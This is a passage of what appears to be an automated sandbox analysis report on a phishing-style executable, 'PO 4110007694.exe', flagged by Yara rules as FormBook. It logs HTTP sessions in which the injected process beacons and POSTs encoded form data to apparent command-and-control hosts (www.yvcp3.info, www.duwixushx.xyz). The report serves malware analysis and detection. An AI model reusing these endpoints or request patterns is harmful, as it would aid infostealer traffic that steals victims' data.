                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.450048156.251.17.224804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:45.918762922 CET484OUTGET /q0vk/?BTPDLZX=TqE1JZ2PW3JWY2uYnAavAXklIsUks6+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU6XPzOQdjNl3sAk02DQStC+27G1hNmCW/pJs=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:52:47.426070929 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.45004947.254.140.255804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:52.994168997 CET745OUTPOST /x20l/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Origin: http://www.yvcp3.info
                                                                  Referer: http://www.yvcp3.info/x20l/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 53 73 6e 51 47 53 6f 79 46 54 72 74 6f 31 4f 46 32 50 42 53 76 46 46 4b 59 4f 78 63 4f 47 65 68 54 69 33 61 41 64 2b 48 2f 64 6f 6a 46 44 44 41 55 2f 34 33 73 66 6c 74 64 54 4a 45 52 43 34 36 52 62 46 54 47 7a 75 51 4f 61 37 56 72 65 6a 47 43 43 46 45 61 70 2b 5a 79 67 55 44 5a 33 7a 74 46 7a 43 78 42 63 51 45 6c 38 55 33 61 6f 63 43 54 74 36 41 68 78 65 6b 57 31 36 59 6e 65 34 53 46 61 32 61 63 6d 46 71 30 30 44 5a 41 43 38 2b 6d 75 77 6e 6f 33 6e 6e 46 49 45 49 37 4b 61 4b 5a 32 67 74 36 50 43 6a 49 72 6c 49 73 78 42 4f 6f 63 4e 4d 65 56 65 4e 52 7a 64 44 78 51 7a 72 42 41 3d 3d
                                                                  Data Ascii: BTPDLZX=SsnQGSoyFTrto1OF2PBSvFFKYOxcOGehTi3aAd+H/dojFDDAU/43sfltdTJERC46RbFTGzuQOa7VrejGCCFEap+ZygUDZ3ztFzCxBcQEl8U3aocCTt6AhxekW16Yne4SFa2acmFq00DZAC8+muwno3nnFIEI7KaKZ2gt6PCjIrlIsxBOocNMeVeNRzdDxQzrBA==
                                                                  Dec 4, 2024 12:52:54.298651934 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:52:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BAC4755C4F48762BADCE24E5D9C1C81F61902EB285093D63595120E9400
                                                                  Set-Cookie: _csrf=a6909aa77123718158ffc941b86d9911ae85cba8a08572b458601632067aed1da%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22m0wmc7l3Y6T7AIl_gX1UolXmwUXrCn1-%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 48 72 39 71 39 49 4f 65 77 37 79 44 44 31 74 51 59 31 64 59 58 42 2d 43 34 34 71 77 78 35 67 4f 77 42 35 75 4d 64 64 6a 6d 57 78 53 6f 72 47 73 54 6b 58 50 61 73 36 61 56 6f 41 78 44 45 2d 46 79 59 36 32 30 57 76 52 67 31 4d 56 53 48 4b 68 44 4f 5f 53 41 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="3Hr9q9IOew7yDD1tQY1dYXB-C44qwx5gOwB5uMddjmWxSorGsTkXPas6aVoAxDE-FyY620WvRg1MVSHKhDO_SA=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:52:54.298670053 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  46192.168.2.45005047.254.140.255804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:55.658442974 CET765OUTPOST /x20l/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Origin: http://www.yvcp3.info
                                                                  Referer: http://www.yvcp3.info/x20l/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 53 73 6e 51 47 53 6f 79 46 54 72 74 70 56 2b 46 7a 6f 56 53 75 6c 46 46 46 2b 78 63 62 57 65 74 54 69 4c 61 41 65 7a 41 2f 50 4d 6a 46 6a 54 41 58 2b 34 33 74 66 6c 74 58 7a 4a 42 62 69 34 31 52 62 35 68 47 79 53 51 4f 61 76 56 72 66 54 47 46 78 64 48 5a 5a 2b 58 70 51 55 37 45 48 7a 74 46 7a 43 78 42 64 30 36 6c 38 4d 33 61 62 45 43 54 4d 36 44 73 52 65 6e 58 31 36 59 6a 65 34 4a 46 61 33 67 63 6e 59 50 30 32 72 5a 41 48 34 2b 6d 2f 77 6b 69 33 6e 6c 61 34 46 50 77 4b 58 44 41 6e 70 45 6e 75 43 66 42 70 4a 6b 70 33 4d 55 35 74 73 62 4d 56 36 2b 4d 30 55 33 38 54 4f 69 61 4b 70 47 59 63 70 71 35 69 74 62 4e 53 46 6e 43 38 66 76 66 58 73 3d
                                                                  Data Ascii: BTPDLZX=SsnQGSoyFTrtpV+FzoVSulFFF+xcbWetTiLaAezA/PMjFjTAX+43tfltXzJBbi41Rb5hGySQOavVrfTGFxdHZZ+XpQU7EHztFzCxBd06l8M3abECTM6DsRenX16Yje4JFa3gcnYP02rZAH4+m/wki3nla4FPwKXDAnpEnuCfBpJkp3MU5tsbMV6+M0U38TOiaKpGYcpq5itbNSFnC8fvfXs=
                                                                  Dec 4, 2024 12:52:56.964818001 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:52:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2B813397DBE986CB5C4E05A354C47B1970B7C9810716FF073327AEFAFE00
                                                                  Set-Cookie: _csrf=9a1ee4f1992cf8075a77323b7965d5c04f5c4b8799b42e6e1adef73ea944e340a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Psy_7H864pI67CSEPaGBo4Y79fBc4iWj%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 77 34 53 67 43 54 52 62 47 72 32 5a 70 50 72 71 30 6e 53 4b 74 45 55 55 41 46 6d 6e 42 38 66 38 49 45 4e 34 75 30 72 34 7a 4a 76 66 57 76 66 45 35 6c 55 58 4d 49 57 32 74 32 63 43 6f 46 76 67 58 55 58 51 77 6d 6f 52 69 6a 4a 35 30 2d 42 32 55 4b 30 57 41 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="Pw4SgCTRbGr2ZpPrq0nSKtEUUAFmnB8f8IEN4u0r4zJvfWvfE5lUXMIW2t2cCoFvgXUXQwmoRijJ50-B2UK0WA=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:52:56.964917898 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  47192.168.2.45005147.254.140.255804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:58.330331087 CET10847OUTPOST /x20l/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Origin: http://www.yvcp3.info
                                                                  Referer: http://www.yvcp3.info/x20l/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 53 73 6e 51 47 53 6f 79 46 54 72 74 70 56 2b 46 7a 6f 56 53 75 6c 46 46 46 2b 78 63 62 57 65 74 54 69 4c 61 41 65 7a 41 2f 50 45 6a 46 31 66 41 58 5a 73 33 38 76 6c 74 55 7a 4a 41 62 69 34 73 52 62 51 71 47 79 65 41 4f 59 58 56 72 35 6e 47 41 41 64 48 4f 4a 2b 58 32 67 55 41 5a 33 79 6c 46 33 66 34 42 63 45 36 6c 38 4d 33 61 61 30 43 56 64 36 44 75 52 65 6b 57 31 37 4d 6e 65 35 48 46 61 76 61 63 6b 30 78 30 47 4c 5a 41 6e 6f 2b 6e 4a 4d 6b 75 33 6e 6a 5a 34 46 74 77 4b 62 41 41 6a 42 75 6e 75 32 78 42 6f 78 6b 72 44 5a 52 70 5a 59 36 53 30 69 48 62 6d 73 43 33 6b 69 61 5a 34 5a 64 4a 64 4e 6d 68 54 6f 31 43 6a 73 71 61 4f 72 79 47 43 38 35 4d 47 53 59 61 51 6d 4c 6d 52 79 76 7a 41 6e 43 57 43 72 2f 73 6a 6d 67 56 77 58 66 52 61 54 36 65 39 33 75 75 48 2f 63 69 2f 4c 59 69 45 37 39 56 48 78 43 38 6f 55 75 66 66 47 6c 33 4a 50 7a 69 34 54 45 6c 41 33 68 56 6b 35 65 31 66 71 46 73 49 66 6e 59 30 34 42 39 75 79 58 51 32 70 6f 6d 41 5a 31 38 4e 62 71 7a 79 49 55 66 4e 6b 56 51 4a [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=SsnQGSoyFTrtpV+FzoVSulFFF+xcbWetTiLaAezA/PEjF1fAXZs38vltUzJAbi4sRbQqGyeAOYXVr5nGAAdHOJ+X2gUAZ3ylF3f4BcE6l8M3aa0CVd6DuRekW17Mne5HFavack0x0GLZAno+nJMku3njZ4FtwKbAAjBunu2xBoxkrDZRpZY6S0iHbmsC3kiaZ4ZdJdNmhTo1CjsqaOryGC85MGSYaQmLmRyvzAnCWCr/sjmgVwXfRaT6e93uuH/ci/LYiE79VHxC8oUuffGl3JPzi4TElA3hVk5e1fqFsIfnY04B9uyXQ2pomAZ18NbqzyIUfNkVQJJjul7XM981qIhQGW1y4lHIWB1sukE/akM0QBYK33wq6JRp4uoWSsoFRqaat0LjpU2IzzI50v7AXJyxYuODZeM6bIngt5CcP+5LaJTjJso2hld6okHDqs8PaCFHwZk3dfM7ZN2OMdTKbrPrZxtE+fJHtMidnzr20HCuhB5UZrl9+U8Og+G+fS91DfmqC51JeSST9Q/rGdDQixVi4pTReqkpkC6997PlVPvm7i81mWeYqi/yWlFDK93u5aLJqeSVUMmTkf+6x1ckpFb/Nu3ft/N9NA4H4kKxyV5OuGZcUT6bXOyg+37oNLKfT7KBb64tz6fLlz/QCGRJfeLw23BE6+2WAdiUMNqtszEfAgr1qCJMw+gOZZu+XgBe1FNLrqXlRgudZly85rJZWS9YdjSI2snuGVF181BxHzLRDA0tGLtweDZLM/ZMeSJhAfGht6584ZAdFBrOI3nqUJ/pzcwWHasRlNPupofYITthe5e/C8Vl9WY4sQ58SHl4+9Fnld7fMJF8wLvw06Y/UUDycynWoyPq1FsIdPoVAGnFvAN8S/tU7qig8F52Mho4bs/VM1dHaLsh/Sh0v7u6mXw3XOyR9Yo4+LVlWV1+Tm3LuvsMYPuNBl6sZ6ZeLam3R+pg75s+N1DS5yrvkHFlgwaDdBJxd6/J595vp0u5o/0z [TRUNCATED]
                                                                  Dec 4, 2024 12:52:59.712037086 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:52:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BA4C03F7875C9836252DFDE6662D24BE023FEE08804809F4381DB25F600
                                                                  Set-Cookie: _csrf=2600c4fa145ba9ab5add2e1932fb36cd832c7bb4977c3ecb8ef4685c0e838d2ea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22zhSowqriAwHpcx3LY_9g4XddHQU74CEX%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 6c 30 78 2d 41 68 7a 43 61 2d 43 32 44 49 39 73 74 39 64 4a 71 43 59 6f 58 5a 5f 6a 31 77 53 66 37 73 72 50 44 44 32 58 33 6d 30 4e 57 4b 58 66 77 4a 37 78 73 4f 76 65 6b 33 52 70 32 35 71 2d 63 65 59 45 55 76 58 4f 48 59 33 36 6e 34 4c 42 4c 55 61 49 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="zl0x-AhzCa-C2DI9st9dJqCYoXZ_j1wSf7srPDD2X3m0NWKXfwJ7xsOvek3Rp25q-ceYEUvXOHY36n4LBLUaIQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:52:59.712075949 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  48192.168.2.45005247.254.140.255804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:53:01.134576082 CET481OUTGET /x20l/?BTPDLZX=fuPwFllnLQvzi1y5p/ZpnhRgNM4mXlCpPG7RIdaZj/0kEynSdOAf8+xad2xabD02Zo5QEVuMD42Ooe6vMAhBaOmt5mAtHSKuJTa6Be4mvNoGTYEsb86Lrhw=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:53:02.437973022 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:53:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2B6EF7CE246D813F2A67B6634ECF40471C09CEBEF703DFB544C06E69DC00
                                                                  Set-Cookie: _csrf=747b8697c02316fcf19e7214b88d47110cd215a6080696d3778b8b37088faef7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-jrt7cPQ7j7vxss_Mw9RmJa8woAWmtNT%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 35 6f 49 52 34 4d 47 61 73 61 4b 77 30 65 72 71 71 4c 4d 50 6b 37 6a 78 62 6f 53 73 39 64 65 56 48 6d 32 79 6e 35 6c 77 68 34 47 38 48 6f 7a 74 47 55 36 6c 37 32 70 63 4e 33 53 30 62 39 68 41 35 54 38 36 48 5f 35 74 6d 59 6a 46 76 65 64 45 78 47 4d 53 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="K5oIR4MGasaKw0erqqLMPk7jxboSs9deVHm2yn5lwh4G8HoztGU6l72pcN3S0b9hA5T86H_5tmYjFvedExGMSg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:53:02.438080072 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:06:48:54
                                                                  Start date:04/12/2024
                                                                  Path:C:\Users\user\Desktop\PO 4110007694.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\PO 4110007694.exe"
                                                                  Imagebase:0xc10000
                                                                  File size:1'212'928 bytes
                                                                  MD5 hash:125B9B9F3011E06FCB331140CE8BF01F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:06:48:55
                                                                  Start date:04/12/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\PO 4110007694.exe"
                                                                  Imagebase:0x5f0000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:06:49:10
                                                                  Start date:04/12/2024
                                                                  Path:C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe"
                                                                  Imagebase:0xa00000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:4
                                                                  Start time:06:49:13
